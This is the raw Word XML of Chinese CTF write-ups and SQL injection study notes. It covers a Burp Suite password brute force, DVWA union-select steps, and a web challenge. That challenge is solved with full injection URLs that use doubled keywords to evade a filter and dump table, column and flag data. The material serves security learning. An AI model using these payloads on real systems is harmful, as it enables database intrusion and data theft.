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30E75" w14:textId="1467D411" w:rsidR="001A6390" w:rsidRPr="001521BD" w:rsidRDefault="001521BD" w:rsidP="001A6390">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001521BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>细心wp：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5D02B8" w14:textId="69EB2ED0" w:rsidR="00A633C3" w:rsidRDefault="001A6390" w:rsidP="001A6390">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41FD23ED" wp14:editId="25CE4417">
            <wp:extent cx="4945380" cy="38481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EC65" w14:textId="38300CCB" w:rsidR="001A6390" w:rsidRDefault="001A6390" w:rsidP="001A6390">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问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发现4</w:t>
      </w:r>
      <w:r>
        <w:t>04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但这个404点特别，判断应该是访问到了服务器，</w:t>
      </w:r>
      <w:r w:rsidR="00C1774A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能robots</w:t>
      </w:r>
      <w:r w:rsidR="00C1774A">
        <w:t>.txt</w:t>
      </w:r>
      <w:r w:rsidR="00C1774A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里有东西。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C5CBB6" w14:textId="266787E3" w:rsidR="001A6390" w:rsidRDefault="001A6390" w:rsidP="001A6390">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C347CEC" wp14:editId="24A9272D">
            <wp:extent cx="5235394" cy="318543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585" w14:textId="690AF60C" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="001A6390">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>resusl</w:t>
      </w:r>
      <w:r>
        <w:t>.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，访问一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648E22C4" w14:textId="35BE15D9" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="001A6390">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59499789" wp14:editId="5E1A65B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E7EB" w14:textId="5B45F9B3" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="001A6390">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据右下角提示可能是G</w:t>
      </w:r>
      <w:r>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>型爆破密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26893161" w14:textId="41CF3E49" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="001A6390">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>urpsuit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盘它</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBAB952" w14:textId="46955E85" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="001A6390">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62020477" wp14:editId="6BCF1B0E">
            <wp:extent cx="5273040" cy="41376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453D6" wp14:editId="0FB344BC">
            <wp:extent cx="5265420" cy="5166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F2A6" w14:textId="422990AA" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="001A6390">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆出密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D0465B" w14:textId="6430E0B6" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="001A6390">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B2707A" w14:textId="4F9FAED6" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="001A6390">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26DFED4C" wp14:editId="2312A9A0">
            <wp:extent cx="5274310" cy="2830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22DB" w14:textId="4733F99D" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="001A6390"/>
    <w:p w14:paraId="2FFBE95B" w14:textId="6E34226B" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="001A6390"/>
    <w:p w14:paraId="61196552" w14:textId="0ACEB848" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="001A6390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手工注入自学笔记：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B44E0" w14:textId="77777777" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="00C1774A">
      <w:r>
        <w:t>------AnMing--------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0E01C4" w14:textId="77777777" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="00C1774A"/>
    <w:p w14:paraId="5066A57A" w14:textId="77777777" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="00C1774A">
      <w:r>
        <w:t xml:space="preserve">DVWA </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>注入练习</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE71B08" w14:textId="77777777" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="00C1774A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>级别：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">low </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1904AFFD" w14:textId="77777777" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="00C1774A">
      <w:r>
        <w:t>1.猜测字段：order by语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E04B95" w14:textId="77777777" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="00C1774A">
      <w:r>
        <w:t>2.曝出数据库名： union select database（）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC088B1" w14:textId="77777777" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="00C1774A">
      <w:r>
        <w:t xml:space="preserve">3.曝出表名： union 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information,tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'数据库名'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B48C7EB" w14:textId="77777777" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="00C1774A">
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>曝</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">出列名： union select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information,tables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>'表名'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A3F24" w14:textId="77777777" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="00C1774A">
      <w:r>
        <w:t xml:space="preserve">5.曝出字段： union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information,columns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>'表名'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C50778" w14:textId="77777777" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="00C1774A">
      <w:r>
        <w:t xml:space="preserve">6.曝出数据:    union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(user,0x3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a,password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BC53B2" w14:textId="77777777" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="00C1774A"/>
    <w:p w14:paraId="21E3A9FC" w14:textId="77777777" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="00C1774A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小结：语句可以用</w:t>
      </w:r>
      <w:r>
        <w:t>#或者--进行注释，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 可以同时曝出多个数据，方便查看获取的信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FCE59D" w14:textId="77777777" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="00C1774A">
      <w:r>
        <w:t xml:space="preserve">           如果空格被过滤可以用+或/**/来绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37805A21" w14:textId="6E3F588E" w:rsidR="00C1774A" w:rsidRDefault="00C1774A" w:rsidP="00C1774A">
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>特殊字符串被过滤</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>可以通过双写，例如：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uunionnion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>等来绕</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F352B43" w14:textId="05C95D92" w:rsidR="001521BD" w:rsidRDefault="001521BD" w:rsidP="00C1774A"/>
    <w:p w14:paraId="19174E4F" w14:textId="2E23DCE1" w:rsidR="001521BD" w:rsidRDefault="001521BD" w:rsidP="00C1774A"/>
    <w:p w14:paraId="30DD75B6" w14:textId="5B79A48F" w:rsidR="001521BD" w:rsidRDefault="001521BD" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001521BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>多次wp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AAF20A" w14:textId="0227336B" w:rsidR="001521BD" w:rsidRDefault="001521BD" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18418CC7" wp14:editId="60E9BDE7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3F2" w14:textId="594F72DF" w:rsidR="001521BD" w:rsidRDefault="001521BD" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>刚打开网页是这样的，略</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>懵</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>逼，看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>猜测是注入，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>直接跑，无果……</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>老老实实手注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F450205" w14:textId="79612761" w:rsidR="001521BD" w:rsidRDefault="001521BD" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>通过length判断过滤了哪些语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE24452" w14:textId="6032A3A6" w:rsidR="001521BD" w:rsidRDefault="001521BD" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>nion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>,select</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>,or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B504987" w14:textId="77777777" w:rsidR="00500F0D" w:rsidRDefault="00500F0D" w:rsidP="00500F0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7221705E" w14:textId="77777777" w:rsidR="00500F0D" w:rsidRDefault="00500F0D" w:rsidP="00500F0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001521BD">
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>http://123.206.87.240:9004/1ndex.php?id=1%27^length(%27union%27)%3E0%23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BD0407" w14:textId="77777777" w:rsidR="00500F0D" w:rsidRPr="00500F0D" w:rsidRDefault="00500F0D" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242E63C2" w14:textId="77777777" w:rsidR="001521BD" w:rsidRDefault="001521BD" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>判断order的时候出现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4383E5A1" w14:textId="77777777" w:rsidR="001521BD" w:rsidRDefault="001521BD" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A3B4197" wp14:editId="28BDE9C4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13E9" w14:textId="07E0CC6C" w:rsidR="001521BD" w:rsidRDefault="001521BD" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>不是很清楚什么意思，order可以用union</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>select代替</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560F11E4" w14:textId="7ABC8579" w:rsidR="00500F0D" w:rsidRDefault="00500F0D" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>构造语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D40B0C9" w14:textId="7F68A785" w:rsidR="00500F0D" w:rsidRPr="00500F0D" w:rsidRDefault="001521BD" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001521BD">
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>http://123.206.87.240:9004/1ndex.php?id=-1%27ununionion%20selselectect%201,2%23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F30A250" w14:textId="6CEF83F0" w:rsidR="001521BD" w:rsidRDefault="001521BD" w:rsidP="00C1774A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21E33B76" wp14:editId="0CDD7EE5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2E7ABB63" w14:textId="77777777" w:rsidR="001427BE" w:rsidRDefault="001427BE" w:rsidP="00C1774A"/>
    <w:p w14:paraId="7057C250" w14:textId="77777777" w:rsidR="001427BE" w:rsidRDefault="001427BE" w:rsidP="00C1774A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>曝出表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DBED05" w14:textId="7B9A9326" w:rsidR="001521BD" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00CA6FC9">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,(selecselectt%20table_name%20from%20infoorrmation_schema.tables%20where%20table_schema=database()%20limit%200,1)%23</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27E59F3A" w14:textId="539B193E" w:rsidR="001521BD" w:rsidRDefault="001521BD" w:rsidP="00C1774A">
      <w:hyperlink r:id="rId14" w:history="1"/>
      <w:r w:rsidR="002072B9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001427BE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00245038" wp14:editId="4AE3B15D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163" w14:textId="77777777" w:rsidR="00E3657E" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>曝</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出列名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F7AB1" w14:textId="5C5F6D2B" w:rsidR="001521BD" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00CA6FC9">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,(selecselectt%20column_name%20from%20infoorrmation_schema.columns%20where%20table_name=%27flag1%27%20limit%200,1)%23</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56A68DEA" w14:textId="0FE89CCF" w:rsidR="00E3657E" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="754DCD58" wp14:editId="3FB56392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B168" w14:textId="7C1D00E6" w:rsidR="00E3657E" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>oncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>曝出flag</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB86938" w14:textId="77777777" w:rsidR="00E3657E" w:rsidRDefault="00E3657E" w:rsidP="00C1774A"/>
    <w:p w14:paraId="69D46C2A" w14:textId="78ABF371" w:rsidR="00E3657E" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00CA6FC9">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,concat(flag1)%20%20from%20flag1%23</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77A73952" w14:textId="5180507C" w:rsidR="00E3657E" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但提交后发现不对，可能有存在与其他字段里</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C870E" w14:textId="626D0D82" w:rsidR="00E3657E" w:rsidRPr="00E3657E" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00CA6FC9">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,concat(f)%20%20from%20flag1%23</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BA5F447" w14:textId="71FD9CE4" w:rsidR="00E3657E" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2978CE7E" wp14:editId="4F2C7C5E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EE35" w14:textId="387B6B96" w:rsidR="00E3657E" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>曝出address列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737457CE" w14:textId="303ACE00" w:rsidR="00E3657E" w:rsidRPr="00E3657E" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00CA6FC9">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,(selecselectt%20column_name%20from%20infoorrmation_schema.columns%20where%20table_name=%27flag1%27%20limit%20</w:t>
        </w:r>
        <w:r w:rsidRPr="00CA6FC9">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidRPr="00CA6FC9">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>,1)%23</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3646DEAF" w14:textId="608CED0C" w:rsidR="001521BD" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="196ECF29" wp14:editId="3E5F1E02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D98C" w14:textId="40FEEEE1" w:rsidR="001521BD" w:rsidRDefault="001521BD" w:rsidP="00C1774A">
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://123.206.87.240:9004/1ndex.php?id=-1%27ununionion%20selecselectt%201,concat(address)%20from%20flag1%23</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F1F15AB" w14:textId="724BF7F8" w:rsidR="00E3657E" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="527838E4" wp14:editId="71125812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CAC5" w14:textId="3EC23F16" w:rsidR="00E3657E" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>第二</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>关还是</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFAFBDE" w14:textId="77777777" w:rsidR="00E3657E" w:rsidRDefault="00E3657E" w:rsidP="00C1774A">
